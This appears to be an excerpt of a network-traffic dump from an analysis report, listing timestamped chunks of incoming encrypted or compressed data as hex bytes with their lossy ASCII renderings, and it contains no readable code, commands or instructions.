                                                                                    2023-04-26 14:44:26 UTC37INData Raw: 26 7b d9 ae 9d 21 ff b2 c3 a1 9d cf 29 5c f9 2f b9 03 05 c5 8c b3 ad f4 a4 1d f8 b5 a8 b0 f2 eb 9b b6 f6 1c 3b 92 77 8f 65 d3 de e3 1d 61 78 6b bd 4f 2b bc c5 42 14 35 50 39 ae e4 12 b5 a3 08 9b 49 e2 3b 9c ea 13 87 47 80 0b 51 c2 b1 72 1a 4a b5 fb d0 dd 0d c4 9a a6 21 ee d5 08 7b 45 31 01 a5 b5 10 62 e4 b1 b3 40 8b 4c de 81 fa 93 25 fc 80 a7 52 5d 1a 3c 2c 48 ff ea df c8 76 cd 66 af 36 94 c9 a8 27 f7 67 74 fd d0 03 16 fd a8 0d 59 ae 62 4a 20 c8 a6 59 94 5e 4c 17 a0 63 b0 2b f4 50 ee be e1 ca ac f8 3e 7f ec 98 7e 8c 9f 93 cc 6d 18 64 87 56 cd 9b a1 37 ed 7c 7d 7f 9e 24 26 4f 3d 35 50 6b 8c ef e9 7f ec e5 d8 f7 f6 e7 c0 8a 41 6e cc 0a 77 b6 65 ab 91 03 3f 7d 19 f7 d9 ba bf bb 37 dc d5 87 0b e1 fd f5 71 27 66 21 c8 45 a1 0e 5f 05 b1 cf 75 9e 87 db 75 0a 4f
                                                                                    Data Ascii: &{!)\/;weaxkO+B5P9I;GQrJ!{E1b@L%R]<,Hvf6'gtYbJ Y^Lc+P>~mdV7|}$&O=5PkAnwe?}7q'f!E_uuO
                                                                                    2023-04-26 14:44:26 UTC38INData Raw: a6 4d 2f ee 46 39 ea 8d 7e 85 8f c5 88 77 e5 35 b6 b5 b9 41 9d 10 27 c5 9e 4a 0c 54 0d ca 87 a3 9e c6 51 ed 48 99 2d 0e e5 a6 5c cd 49 ce a2 2b c1 53 da 05 3d dd 4c 5c 9f 1c 2d 57 f0 0b 90 27 86 4f f9 90 79 3a 65 ab b2 33 eb 79 83 7b b5 a8 ff b6 df 78 48 4e 15 20 4d c4 00 d7 0f a6 de 62 ed 0b 91 9e f8 1b 5b 86 62 47 32 8a f5 14 0b 44 f8 e8 72 8f 50 34 99 6b f5 45 ac 61 cb 54 05 72 02 2c f6 b1 05 66 cd aa 20 8b 8d 0e 03 83 4c 47 b0 34 ae 8e 71 9d be 71 ae ba 43 2b 4d f0 3a 46 8d f3 b4 09 02 ea d9 ca 3c 9a 20 7a 08 ad b3 46 89 10 e7 96 52 45 2e c1 dd 09 03 52 c6 a2 ee 90 a6 ab 3c 17 02 08 ed 9f 00 70 70 c9 fb ab f8 14 e5 2c ae 80 34 f3 33 f3 76 b1 98 6e 17 e9 bf 15 fc ec ac 8d 27 39 62 26 84 1e 85 92 cb b3 58 0f 29 a0 6c 2d 87 c2 a7 5f 36 54 db 31 49 7c e5
                                                                                    Data Ascii: M/F9~w5A'JTQH-\I+S=L\-W'Oy:e3y{xHN Mb[bG2DrP4kEaTr,f LG4qqC+M:F< zFRE.R<pp,43vn'9b&X)l-_6T1I|
                                                                                    2023-04-26 14:44:26 UTC40INData Raw: 73 81 61 8d 1b 0c 37 3c d8 54 e1 00 86 c4 12 20 29 90 09 9a f9 18 ad 6e 98 72 26 6c 64 c5 2d 51 02 f2 ac f7 dd 35 42 4b 7f 97 cd 0b 39 c8 8b 7e 33 4f f3 5f c0 ae 97 12 d6 8e 5c 9d a4 3f 63 d5 74 1d 33 08 03 38 39 29 87 00 90 8f 9d ea 50 68 71 14 38 83 f1 f2 26 d0 4b bb fd 4c f1 30 44 f4 fb 04 17 36 78 70 2a 79 9c c4 76 78 bf c6 6a 82 fd 97 f4 64 32 2a be 6a 84 dd 9f e3 c7 ff ff df 06 58 08 89 a4 7d 50 43 98 80 a0 ee 7c ce 63 05 05 2f 25 52 68 c3 14 74 bd d3 5e 64 ae c1 87 e0 b3 9c e9 0d 48 c9 63 76 79 60 3b 9b 59 6f 8c 86 24 47 3f 3a d1 e0 de f8 ab 8d 8b 96 2c a5 ea 60 76 73 78 84 88 30 52 bb 3b 21 71 db e4 da f3 35 c7 ec c4 47 52 fe b9 e4 3e 1b 33 88 5d a7 97 04 19 4a f3 ef 88 2a 48 6b 03 a1 8b 19 e1 01 df ea c0 14 56 c1 b6 16 95 05 5e 93 74 5b 8c f5 10
                                                                                    Data Ascii: sa7<T )nr&ld-Q5BK9~3O_\?ct389)Phq8&KL0D6xp*yvxjd2*jX}PC|c/%Rht^dHcvy`;Yo$G?:,`vsx0R;!q5GR>3]J*HkV^t[
                                                                                    2023-04-26 14:44:26 UTC41INData Raw: d9 42 e6 8c 1f 0d 46 2e 9c 7e 36 b7 71 77 c0 5b 21 0d 2c b4 4f 87 79 50 7d 76 04 35 7a b1 57 e9 f3 8c 7b 06 ba e0 a8 46 0d f3 b1 40 2d b0 52 f7 40 0c 7d fb 54 fa e2 bc b6 99 98 ff 44 b3 1a 56 25 05 bf 1c 13 2b 22 d8 fd 53 cc 3c c9 b9 9e 70 76 02 35 d5 d4 8f 40 63 07 bb 30 b8 b6 64 dd e1 f9 eb 6c 67 06 ad 28 82 25 cb 6b ea be f2 cb 36 68 b7 a3 4b 0b 77 f5 85 56 81 5c 53 41 59 2d 3c b0 c3 c7 7b d7 25 5f bb 8e a7 a2 d0 3d 77 96 0e f3 5f c4 a2 fb 0e ce 9a 88 86 10 7d b9 71 07 1d bc 3b b9 e3 3b a2 9a 31 d2 bf 86 81 ee 86 8e bf 56 2c 1d a2 88 6b c9 d3 f1 99 a2 7f e7 de 77 69 ae 6a 62 75 12 a1 e9 fe 63 f4 51 8b 23 c3 ee 0d c1 90 c2 5c 03 16 d9 0e bc a6 bd 12 f4 45 63 d5 a8 fe 52 3b 43 5c 37 15 54 8e 89 05 dc 71 7c c4 f5 88 4f 21 51 57 1b 79 f5 27 fd 02 82 78 dc
                                                                                    Data Ascii: BF.~6qw[!,OyP}v5zW{F@-R@}TDV%+"S<pv5@c0dlg(%k6hKwV\SAY-<{%_=w_}q;;1V,kwijbucQ#\EcR;C\7Tq|O!QWy'x
                                                                                    2023-04-26 14:44:26 UTC42INData Raw: 2b f1 ac 8d fe 6b 04 d8 e5 9c 07 d8 00 b3 f1 35 29 a0 bf 5e b5 25 25 1b 44 e6 dc 29 fa 21 19 a4 4f 57 44 d2 b2 77 3a d7 58 d1 57 21 91 26 99 8e 9a a7 02 14 b4 9c cf ab c9 3f 86 0a 26 aa 61 0b 28 d1 2c 7d a7 d0 1c 24 ba 93 0a e1 df 61 7d c9 ea 22 73 c2 74 c7 30 71 95 fe df 5e fc 20 e0 87 a8 30 28 f8 f6 6a b0 d8 e8 c7 0a f7 46 26 27 56 d7 71 4f d6 4c 0d 3a e7 5d 96 9a 83 71 af 74 13 6a 23 b1 90 fb 20 1d 3f c0 dd ee da e3 c1 fd 83 da b2 26 f8 0b e4 a5 30 4e e0 54 d9 63 ca ce 14 20 0d 39 59 56 55 b7 df dd 37 5a ea 08 fb 6a 59 cf 67 88 88 e3 35 b9 4e e0 a4 06 0a e0 91 48 42 ff cc 33 ba 1f 6f 41 20 8c 94 27 28 62 4d df 69 d8 71 c9 c9 9f d9 a3 81 40 eb 82 6f f3 09 6b 91 48 0e a3 e2 c2 85 04 9f 33 94 60 16 f7 9d f3 30 7f 52 58 b8 af c7 69 51 b5 8e 62 c1 6f 6f 69
                                                                                    Data Ascii: +k5)^%%D)!OWDw:XW!&?&a(,}$a}"st0q^ 0(jF&'VqOL:]qtj# ?&0NTc 9YVU7ZjYg5NHB3oA '(bMiq@okH3`0RXiQbooi
                                                                                    2023-04-26 14:44:26 UTC43INData Raw: a6 f3 4a 26 f5 4d a0 9e 97 2b 74 62 98 31 e8 26 0f 14 e3 41 49 e9 a1 d4 66 2b 8b 4c 66 ef 43 18 a8 34 cd 24 4a ab 12 27 5e 88 26 22 f9 2b f4 cd 1a 0e 97 6a 14 76 09 df ec ed 1e 48 c0 b4 05 c3 a5 bb 02 cb 77 ce ba 5b ce 50 11 3d f5 65 dc 05 d4 76 9b 1b 57 23 09 37 a6 d5 3a 30 9a f5 84 3e cb 50 e6 5e 5f 8b 17 11 72 f0 b6 27 eb c0 b6 25 d8 31 81 e4 61 af fd dd ad e0 38 69 da 8e 06 2b 5f f4 c6 8d 33 cc 46 30 49 ee d7 61 9b 6f 1d 83 2f 55 35 f4 78 db 79 26 34 b3 08 46 3f f9 25 90 fd 5c 4d 5f f1 4f f5 20 b0 07 db 87 4c 90 12 7a 6e eb 07 28 19 61 f1 c4 7d 48 f3 3a 72 43 b0 54 f5 65 59 18 4c 71 d2 0a d2 36 d5 bc 7e 5a ac 9a f4 25 c7 bb 91 d4 43 26 34 7a 66 3a c3 99 f6 d6 54 d9 a6 fc aa c3 11 1c 30 f8 a1 ca 0b 31 60 67 2a c1 88 60 61 1e ad 00 95 68 e3 67 02 88 32
                                                                                    Data Ascii: J&M+tb1&AIf+LfC4$J'^&"+jvHw[P=evW#7:0>P^_r'%1a8i+_3F0Iao/U5xy&4F?%\M_O Lzn(a}H:rCTeYLq6~Z%C&4zf:T01`g*`ahg2
                                                                                    2023-04-26 14:44:26 UTC44INData Raw: 63 b2 1e 9b ed 9d b1 ba 26 f0 89 ad c5 58 2b 93 fb 8e db 88 2c df 0c 89 f1 ab 47 5b 57 35 e5 eb 32 21 9f 8d f3 19 75 12 0e 78 12 03 13 0b d9 2d 8b c0 5b 09 cd 70 d4 ca c6 b8 f6 72 f1 e6 d7 0b 23 b0 b9 2b 2a 65 d0 bc 23 23 ae c0 74 77 9d 4e 49 d2 c9 bc 5d bb 7c fe 78 39 46 62 41 ad d2 72 b6 c1 d4 4c 3b de 1e 7b b8 78 d4 cb bb 9e 22 5b c9 1e 54 e1 14 f5 90 30 98 ba 8f d6 78 9f 70 af fc 8b 65 dc 32 33 d4 4d 45 7d b1 3e b3 2f 07 8c ff 70 2a de 3f 76 bb 5e da 36 09 59 0d 44 be 0a 76 ce 5f b9 5e 89 46 75 d0 38 e1 7a d6 f6 b1 1b 52 a7 cb 41 65 4c fc ec df 68 18 8e a8 24 26 c0 d7 7c 28 9c 14 b4 11 00 77 ca a0 b6 fd 8d d6 30 83 6e d6 af 7d 4e 22 cf 58 02 2e fe cb 1b 89 90 ca ed 23 8d 92 f9 08 f8 11 f6 90 72 09 44 ed 2f 86 b9 b3 d7 07 25 79 bd 6f 57 ea 96 35 c0 52
                                                                                    Data Ascii: c&X+,G[W52!ux-[pr#+*e##twNI]|x9FbArL;{x"[T0xpe23ME}>/p*?v^6YDv_^Fu8zRAeLh$&|(w0n}N"X.#rD/%yoW5R
                                                                                    2023-04-26 14:44:26 UTC46INData Raw: 78 c5 a7 7e cb b4 af 27 41 35 bb fd 94 6a 8e 71 6f 20 eb c2 2c 49 7e 19 3f 53 6c 61 53 f4 4d d3 89 8e 0b fb c8 c0 2c ad 06 16 3a 29 30 38 bd cc 67 eb 68 d3 6a d0 a3 de ba 71 fc 99 b2 fa c1 32 f8 fb 37 85 cc 2e ee 0c 2f 71 32 69 9b cc 85 21 b3 38 56 01 71 59 4a 8b fc 0c ce be fc 87 ba 83 65 94 2b 7d b3 3b 64 79 bf 66 f8 24 c5 f0 fa 61 44 8e 14 cf 3d 31 60 42 88 c4 36 4d 9f f3 0f a5 6a 08 f5 07 24 be 38 6b b9 87 47 03 bb 58 cc dc 8f 93 b1 8c ea 80 6c 8b 09 db 67 59 44 58 45 ef d9 c5 7f b2 4b 3c ed ea 18 56 d4 b7 e5 e4 7e 10 f2 27 ca c5 2c 27 14 1b cf cb 08 94 17 45 2f cc 32 6e a1 36 f4 9d 58 8e ef 69 4e e1 a7 15 bb f8 28 b9 67 17 9d ab 09 67 d7 59 b1 85 b7 00 6e e7 6b dc 27 dd ee 56 76 82 bf 63 58 16 30 9a 7e 0d 73 6f 1c a1 5e ef 1a b2 5d 3e b7 c8 41 d5 4b
                                                                                    Data Ascii: x~'A5jqo ,I~?SlaSM,:)08ghjq27./q2i!8VqYJe+};dyf$aD=1`B6Mj$8kGXlgYDXEK<V~','E/2n6XiN(ggYnk'VvcX0~so^]>AK
                                                                                    2023-04-26 14:44:26 UTC47INData Raw: fd b0 f6 f9 2a 53 11 b3 ee 4a 5c 6e 8b 1b 9f 22 76 c9 85 26 ec df c4 a8 95 cb 80 98 fd 5c 9a bf 7f ec bb 4b 88 77 99 76 38 25 d2 3d 26 c7 3a 32 ca 7c c3 17 1e 7e 63 f0 53 7e f7 28 4d e7 6d b9 f3 7c 43 7e 5d 26 2b e1 ea 67 e8 85 8f cb e1 5f 90 06 c4 60 8d 8a 2b a9 77 a0 ff 5a 7e e6 0e ed 1d 6a 9f c6 f7 eb 0d 2d b1 9f e5 b1 37 a2 a3 45 5e eb e1 23 68 72 e6 a0 e9 e3 19 42 60 2b f1 79 da 7a ca c3 b4 50 c7 d9 e4 34 3f fd 13 77 2a bf 6e e9 da 06 7d ed db 59 f1 c4 42 b6 ad c2 5a 2b 93 21 c1 13 ec 4c 06 e4 6c 8f d1 88 fc f8 47 b8 ec 5e 17 e8 72 0c 19 bd 96 18 4f 9a 94 78 cc d2 ed 33 e8 31 c5 31 fd c0 9b ab 53 84 09 df 6b d3 4e ca 35 e5 d5 85 72 0a d9 6b 65 f7 9f 2b 38 52 c6 b9 84 27 7c 6d e5 f7 ff 35 c3 17 e0 73 bc d4 dc 46 1e 05 f0 2c d1 f9 bb 1f c1 09 cb 86 69
                                                                                    Data Ascii: *SJ\n"v&\Kwv8%=&:2|~cS~(Mm|C~]&+g_`+wZ~j-7E^#hrB`+yzP4?w*n}YBZ+!LlG^rOx311SkN5rke+8R'|m5sF,i
                                                                                    2023-04-26 14:44:26 UTC48INData Raw: c5 5a 1d be 5b cb 50 9c 4d 59 59 28 5e 8b e7 0b 69 ce 63 5f 53 82 92 21 3f ee 85 e2 d1 78 ad 85 51 43 d1 98 4b 50 66 23 e4 29 a6 f8 42 7a 14 af 98 ba c7 ec 12 db 18 e9 cf 3e 55 2e 3e 91 7e 34 eb fb 1e 0e 14 84 f3 6a 9a 3c 53 f8 b1 af 71 c5 bf fb 5a 30 cf 07 16 0f c2 68 ec d9 88 a8 b5 c1 82 98 6e 1f d8 ef 59 9a bb 0b d1 cf 62 c1 55 60 ff 72 b7 1e 43 5b c1 25 ec 4a 91 11 a2 fe e8 bf 27 5e 8e c9 df 9b 20 2b d1 22 74 26 95 86 15 c2 db e6 12 6f 61 c4 a1 8f 4d 3a 27 4b 86 69 5b 99 30 04 1f 1b 18 81 d0 04 2f ce a3 e0 09 2d 80 7e 44 e9 0f 42 7f 7d 35 50 be 9d 71 ee ca 20 18 4f 87 c9 8d f4 27 ff a4 92 de 2f 9e 03 66 67 f5 ff b8 a1 36 c6 92 23 c7 62 b6 ac 92 9d 2a dc e2 bd 33 57 38 be ea 6c b7 36 8b 7e 91 e9 3d 93 5b 29 c4 c1 08 17 7b f5 d0 83 c8 53 50 72 5a e9 1c
                                                                                    Data Ascii: Z[PMYY(^ic_S!?xQCKPf#)Bz>U.>~4j<SqZ0hnYbU`rC[%J'^ +"t&oaM:'Ki[0/-~DB}5Pq O'/fg6#b*3W8l6~=[){SPrZ
                                                                                    2023-04-26 14:44:26 UTC49INData Raw: b0 3f 73 77 1a fe 65 09 bb ca 7f c5 cf 17 33 64 77 ab 78 5e a1 ef cc 4d 9a 97 ad 0b 47 08 1c 79 8e c4 8f d8 11 2f e9 7e 6b 6c 44 c3 84 27 d7 2a 5a 6b 8d 62 22 92 a2 75 b3 de c1 f3 81 fc a7 50 83 5a 25 fc 0b 40 52 10 fe 90 e6 6c 51 08 21 d8 85 98 47 fc 5e 7a 81 8f f5 00 7e 13 c2 5b d5 a6 53 5c 14 73 1b 40 f6 14 e8 48 0d 1b
                                                                                    Data Ascii: ?swe3dwx^MGy/~klD'*Zkb"uPZ%@RlQ!G^z~[S\s@H
                                                                                    2023-04-26 14:44:26 UTC49INData Raw: db 04 d6 4f 54 f6 8c e0 78 63 aa 05 69 b6 63 5e 59 a6 6f f6 95 ba a6 2b a7 4a f0 73 4a 9a 15 6c 34 d4 90 96 98 70 a4 1e 9c 9c d4 06 72 e5 f8 4b ee 68 39 26 dd 93 c0 27 88 75 99 76 df f0 1c 07 8f ad 6f 0d 34 66 55 ae 9f 6d c5 9b fd af 2b c2 c4 60 9a 97 34 3b 6b cb 38 b1 0c c5 12 d3 47 31 91 b2 82 27 ef e4 34 a0 cc 4a 43 ec 0a fd 37 0d bc 2e cd 81 32 ad ac b0 dc 66 52 2a b9 20 a6 53 5a bd a8 86 05 e2 96 b0 d1 6e 9e 3a 3a ba a1 57 08 67 d0 e3 e1 a2 e3 09 46 46 36 92 af 58 11 3a 55 77 e6 6c 79 2a af 29 d7 88 23 d4 26 74 94 39 b3 9e b1 2e 2c 2a 75 5a 0e 35 ab db d9 72 e6 fb 49 c8 62 8f a6 de 1a ed 3f c9 9e f8 bd 3c f4 19 50 ea 2a db 57 1c 57 b6 50 9a 17 f7 c7 35 d5 46 23 77 3a 0b d9 55 8b 4d c6 f6 32 ad c8 4f 63 7b 63 fa 66 94 2c cd af a1 34 66 92 dd 8a 9d 23
                                                                                    Data Ascii: OTxcic^Yo+JsJl4prKh9&'uvo4fUm+`4;k8G1'4JC7.2fR* SZn::WgFF6X:Uwly*)#&t9.,*uZ5rIb?<P*WWP5F#w:UM2Oc{cf,4f#
                                                                                    2023-04-26 14:44:26 UTC51INData Raw: ea 7a 98 3e c3 01 f8 63 eb 0f d3 ee 7c 06 c9 bc 96 61 c1 56 1e 00 57 7a a5 94 c6 65 68 96 1e 4e 03 de 98 61 95 c5 37 83 d7 19 1c d6 d6 0d 7d a3 6f a9 fc de c7 87 18 d7 28 f8 cc 95 cf e4 73 2d b2 70 86 9e 2c 33 a4 55 67 3e dc 7e 4e ce 07 b3 9a 43 96 af 74 b5 fc 8a 95 29 00 1a 28 f6 9f d2 29 cb ac a0 54 cb f1 d8 9a 45 89 90 98 a2 c7 ac 98 46 ed 8b b0 60 0f b5 79 7d 8d e2 6c 58 fb 0b 0d 0a f3 fc 0c ff 68 13 07 44 6d bb 9a 30 94 8b 63 fb a4 2e 5f 00 74 59 d4 1c 5b c0 a8 51 15 e2 21 14 62 cc 13 3c b6 20 50 35 a0 d9 3a f5 ac 60 ea 8b 0c 59 e6 84 ae 4e 4b ed 14 5e f3 9e 41 ac 60 12 94 e8 42 c3 68 c9 14 9c ef 76 a2 12 46 71 64 c1 6f 7b 69 3b 0b 39 b2 ab 71 22 98 41 1e 9d 35 17 bd fb 0a 47 c3 a9 10 c4 fe 3d 92 c9 9a 15 c9 8e 8f 5f 68 a7 61 be 4d aa 31 f4 fb b6 d0
                                                                                    Data Ascii: z>c|aVWzehNa7}o(s-p,3Ug>~NCt)()TEF`y}lXhDm0c._tY[Q!b< P5:`YNK^A`BhvFqdo{i;9q"A5G=_haM1
                                                                                    2023-04-26 14:44:26 UTC52INData Raw: eb 7e 35 04 88 6b bc 24 e5 8b f6 a0 05 07 f6 e2 6a 5b c8 4d a5 32 0c cf 01 62 f3 12 ab 16 6c 1b 11 11 7a 25 d7 40 be 7e a6 ba 64 64 09 bb fd a0 c5 cf ca 81 5f 1f 87 38 f5 5e 10 4b 90 fd 6e 7b 04 7a bb fb bd 62 30 82 cc 92 9c c7 52 af db ac c5 51 17 90 73 87 aa e4 da 22 5a c5 8a 4c 3d d9 57 00 a5 d5 e2 e0 62 60 36 f4 bf 5f b5 c5 1d f4 08 2d 33 51 aa dc 80 04 51 ea a8 b0 f5 ca 41 31 93 c0 b3 7a 5b c5 59 ae 8c 9a 4b 26 14 e8 48 0d 78 7f d2 79 58 4a e2 9b f7 c5 68 8d ba a4 70 57 d5 43 ee 98 d0 5b 56 a6 3f 9b 63 92 8f 08 dc 15 e7 2c 0e 36 84 65 1a fd b1 04 ad 4e ab 4c af be dc b4 3f 74 88 d7 44 72 30 30 86 53 e3 20 82 44 6f 15 47 0c 51 8f 3b ed bb 5c 0b b4 e9 33 61 9d cb 8d dc 17 d2 dc 64 16 fd c5 8f 30 af f4 27 b5 99 d7 e1 3f 76 3e f3 2b 7a 81 a2 2b 5b bd fb
                                                                                    Data Ascii: ~5k$j[M2blz%@~dd_8^Kn{zb0RQs"ZL=Wb`6_-3QQA1z[YK&HxyXJhpWC[V?c,6eNL?tDr00S DoGQ;\3ad0'?v>+z+[
                                                                                    2023-04-26 14:44:26 UTC53INData Raw: 5d e1 dc 8d d3 ed 16 12 a7 38 da c4 cc 3d d1 c3 00 5a 85 a6 3b 18 24 b0 b9 72 42 90 53 4a 66 23 82 da 48 f4 89 da ec 22 81 a9 17 42 3d 0f 35 48 da 85 cf 83 2a 23 e0 c8 19 88 2d d1 22 f8 a2 54 de b9 09 c6 41 e8 56 45 fe 4e bd 5a 3b 68 e9 ff 8f 02 a5 30 7c f9 14 6e aa 73 76 80 29 e2 6c e1 7a 8e a3 c7 e9 ba 15 f4 26 ac 8d f5 83 ec 7f 96 f6 06 d0 0b 4f 64 4b 52 9f 9a c5 2e 40 b7 b8 07 19 57 d9 21 bb e5 47 6f b6 80 2d c6 37 04 01 c5 c6 7e 7f f8 27 c0 d7 f3 53 16 94 c4 54 83 04 ec 8f a1 cc d9 d8 5c af a2 96 2c 95 27 d6 e3 db ea 7a 75 05 13 b9 28 35 c0 9b 8c 65 22 00 c1 b0 2d 6e 5d a1 19 70 af 8c fd 59 15 a4 59 6a 21 24 ef 90 62 f2 86 52 7a 62 cb 67 20 3e bf e6 91 e7 29 09 8d 6c 98 88 db d8 3e 6f d1 54 75 c8 fb d1 1c df 6a 43 c7 79 3c eb ce 72 0b 17 72 e4 d1 b0
                                                                                    Data Ascii: ]8=Z;$rBSJf#H"B=5H*#-"TAVENZ;h0|nsv)lz&OdKR.@W!Go-7~'ST\,'zu(5e"-n]pYYj!$bRzbg >)l>oTujCy<rr
                                                                                    2023-04-26 14:44:26 UTC54INData Raw: 09 11 61 3d 13 24 5d d8 e3 d3 1e ab e0 7b 22 9d f5 8e a2 69 68 a7 61 a6 4d b2 31 3f 40 49 2f 27 dc 25 d0 fe e0 5b a9 c8 fe 47 05 c5 84 c3 ad 29 01 12 40 60 ce 1f 65 b8 23 7d b3 87 94 0a 0e dc c8 32 c5 e4 c2 94 8f b1 07 92 07 43 cd 62 71 76 21 2e 42 4b da b5 18 ba 0b 2c a4 af 8b b9 96 ca cf eb cc 0d b0 cb d1 b8 3e af f6 7b 38 c3 6e 19 c7 40 b5 0e ba 9a a5 4b 0d d0 90 c4 a4 c8 b1 1e 85 8b 4c 03 2b 0b 6a 1a 75 68 5d 75 d4 6f 53 69 ed a4 4d ee a3 d9 b8 36 da 07 09 e8 2b cb ef b5 35 d8 68 ab 91 b2 bf b6 42 1c 79 c8 cd 13 24 4e 92 d7 16 a4 6e 46 12 17 2c 94 06 d5 c7 f1 d2 eb 7d 38 30 9a 2d da c8 70 e5 2b 84 e9 46 37 01 9a e2 98 ed 7c ff 44 a1 5b 19 60 ee 9b a7 71 67 b9 ad 7f 69 da f3 f6 2a 37 80 8a a2 7b 6b cc 4c 5f 12 be c7 fc a7 51 4f 9a 31 6f 24 bf df 0d 9b
                                                                                    Data Ascii: a=$]{"ihaM1?@I/'%[G)@`e#}2Cbqv!.BK,>{8n@KL+juh]uoSiM6+5hBy$NnF,}80-p+F7|D[`qgi*7{kL_QO1o$
                                                                                    2023-04-26 14:44:26 UTC56INData Raw: 00 b0 32 4e 59 1a 35 08 d9 13 8c f7 2e 93 ff 93 9d 10 b3 f6 56 2c 1b 48 4c 85 a2 28 07 61 02 41 c7 7e fb 87 a6 67 6e af b0 c1 68 f8 66 28 71 b1 dc f7 f3 28 a6 05 ec bb 64 39 fe eb 81 e1 de 72 da 4a 37 b5 a7 ad 2d ae b8 f7 ae 3c 33 92 05 9c fa fc 9b 6f 0e 1a a3 ba d6 92 5c 0d 0d 24 f1 0d 8e 3b 6a f0 c6 1f 75 77 f4 76 38 ee 9a b5 29 fd 36 b8 ad ee a0 d4 6c 54 41 2f 0d 60 73 ee 06 75 02 50 73 5c ba a8 ba 83 70 2e 2c ce 90 38 41 a2 94 61 76 ec 45 1f a9 47 04 23 40 32 3e 12 86 0a 97 00 85 85 2f f7 46 7c b8 b6 bf ba 4e 34 ca d0 cb 93 95 3c c5 ea 0d 32 db 20 c2 6c 9f 74 7a f5 46 de 62 62 20 e9 a8 fd 52 9d 31 26 f5 a1 bf 42 ea d2 cd 07 1d 86 02 b6 09 e1 fa bd f5 d5 eb 25 17 7e 71 de eb 7b ff 00 19 b9 23 46 7e 45 67 68 89 18 3e 91 e3 6a fa 0c 98 aa ad 8d 81 94 02
                                                                                    Data Ascii: 2NY5.V,HL(aA~gnhf(q(d9rJ7-<3o\$;juwv8)6lTA/`suPs\p.,8AavEG#@2>/F|N4<2 ltzFbb R1&B%~q{#F~Egh>j
                                                                                    2023-04-26 14:44:26 UTC57INData Raw: c6 be b8 f0 bb 81 e7 37 f8 ef 17 db d2 44 32 c1 84 95 6c 83 1c fa 03 fc 9a 97 3f 4e 96 1b 68 93 a3 c6 b1 af 7c 1f 03 79 35 b6 1d 2b 44 25 56 91 40 70 89 0c 19 99 95 5f bd 4f d0 d3 c9 56 14 34 a5 b0 32 e0 c5 af cc 86 b6 33 43 4a 1e e4 a1 44 1a 6e d1 bc d0 df 43 36 8c 36 42 59 14 2d 88 f1 0b dd e5 e0 04 b9 56 aa 18 10 a4 48 7a 76 8e b6 88 4b b4 5b 80 6e 9f 68 90 7d 9e ef 76 a2 12 4e 71 bc db c0 0b a5 b7 5e 06 1a 70 5f ee bb 72 c5 b6 08 7a 98 54 ef c3 c8 75 99 d3 e1 42 38 bb a3 96 0c d0 ea 6c c7 b0 ca 19 c4 7a 51 a8 db 0a 76 27 be 7e 65 66 94 53 9a fe 08 5a c7 40 c9 e9 b9 5d ed ff 14 9f 64 c4 e1 eb 2e 37 98 9d 63 4e c5 da 85 cd 33 0c 0a 64 ff e4 f8 0c 3e 3d 0b a6 f0 66 0b ca 51 91 61 6e 91 35 a3 c4 fa 74 98 cd 56 8b 6c 4e c7 0c b0 41 86 19 c0 5e 43 d0 1a 4a
                                                                                    Data Ascii: 7D2l?Nh|y5+D%V@p_OV423CJDnC66BY-VHzvK[nh}vNq^p_rzTuB8lzQv'~efSZ@]d.7cN3d>=fQan5tVlNA^CJ
                                                                                    2023-04-26 14:44:26 UTC58INData Raw: 67 f4 8c 78 15 7b 0a 8c c0 e0 ca db ae 11 4e b6 dd d5 c7 96 2a f5 e8 4d 26 c8 36 bb df d6 57 74 37 e0 59 08 8e d8 67 7c 2e 79 a0 31 8c 81 74 60 b6 15 c6 93 0e 1f 2d e8 60 cd d0 c1 cf c0 16 85 79 d7 b9 0b 58 90 52 cf 40 04 1c 71 71 a4 20 78 3d 2a cd cb 27 ef 3a 5e cd 72 43 e3 67 ec 42 f8 11 25 c1 3c 98 bc 9b 60 a8 08 11 39 a1 8f 4e 63 5e 77 41 79 64 35 9b 1e 06 0e a3 df 92 df ab 8c 00 66 21 32 85 b4 c3 bf ec ab 64 58 94 9a 74 61 ae c5 f6 73 11 d2 dc 6b 0a 7a 52 c7 b5 0e 91 fd 93 10 91 9a e3 66 45 f3 ae d2 7e 5d c1 6e 81 de 86 84 7a 29 cd ac 87 01 01 c4 cf 6c f8 52 b1 b4 7b 21 43 1b bc 86 05 6f 2d 24 1d a6 61 b1 cf b8 e5 4c a6 3f 0c b4 31 76 f7 6a 68 7b 38 69 50 e8 57 8a 42 60 fe f0 f2 f1 f7 5d 33 5c 5c 91 26 f1 93 4b cc 46 b2 c6 2c 23 7b 70 72 37 fd 24 c5
                                                                                    Data Ascii: gx{N*M&6Wt7Yg|.y1t`-`yXR@qq x=*':^rCgB%<`9Nc^wAyd5f!2dXtaskzRfE~]nz)lR{!Co-$aL?1vjh{8iPWB`]3\\&KF,#{pr7$
                                                                                    2023-04-26 14:44:26 UTC59INData Raw: c2 70 70 4b 1c 37 37 94 56 fc 2c 58 bd 2b ae 2b 89 a6 de d9 38 9d fa 35 98 2d 6e 8d 81 00 8f 63 49 ce 06 5c 5a 5e 66 bf 91 5f 07 d3 44 32 cc 17 73 f1 12 e4 8e 13 9a 6a a7 b0 a3 47 7d 77 22 b4 61 02 7e d0 1b ee 28 e7 4e 53 fc 44 5c 54 43 8d d9 8e 56 49 ad 1e b2 82 91 58 c4 43 74 a9 1c 50 22 c2 9f ee 67 9e ff f5 d1 45 be d5 f9 00 e4 e1 bc 67 e5 5e 88 63 c7 6f c1 4e 28 8d b0 18 e9 c0 83 d2 e2 d3 6a ad 85 82 cb ec 37 0c 10 8e 2d 48 ea a6 8d 37 bc 74 93 76 03 3b 66 e4 8d 50 21 77 c1 e4 16 3e 83 fb f5 b3 ff 9a ce e1 b0 29 51 27 c3 ac 04 89 e1 6a c4 25 37 25 8f e2 8d 96 2f ba 26 2f d9 fd 12 31 1e 68 15 d2 2c ca cc 22 9a 44 d7 b3 2e 7a 3b 2e ca 82 f5 fd 46 2f bb 1f 52 37 b3 9e 10 3f 7a bc c8 cb da 71 bd 3a 50 c7 af 55 73 3f b4 59 b7 c1 d4 9a 6c 17 44 f3 81 75 4d
                                                                                    Data Ascii: ppK77V,X++85-ncI\Z^f_D2sjG}w"a~(NSD\TCVIXCtP"gEg^coN(j7-H7tv;fP!w>)Q'j%7%/&/1h,"D.z;.F/R7?zq:PUs?YlDuM
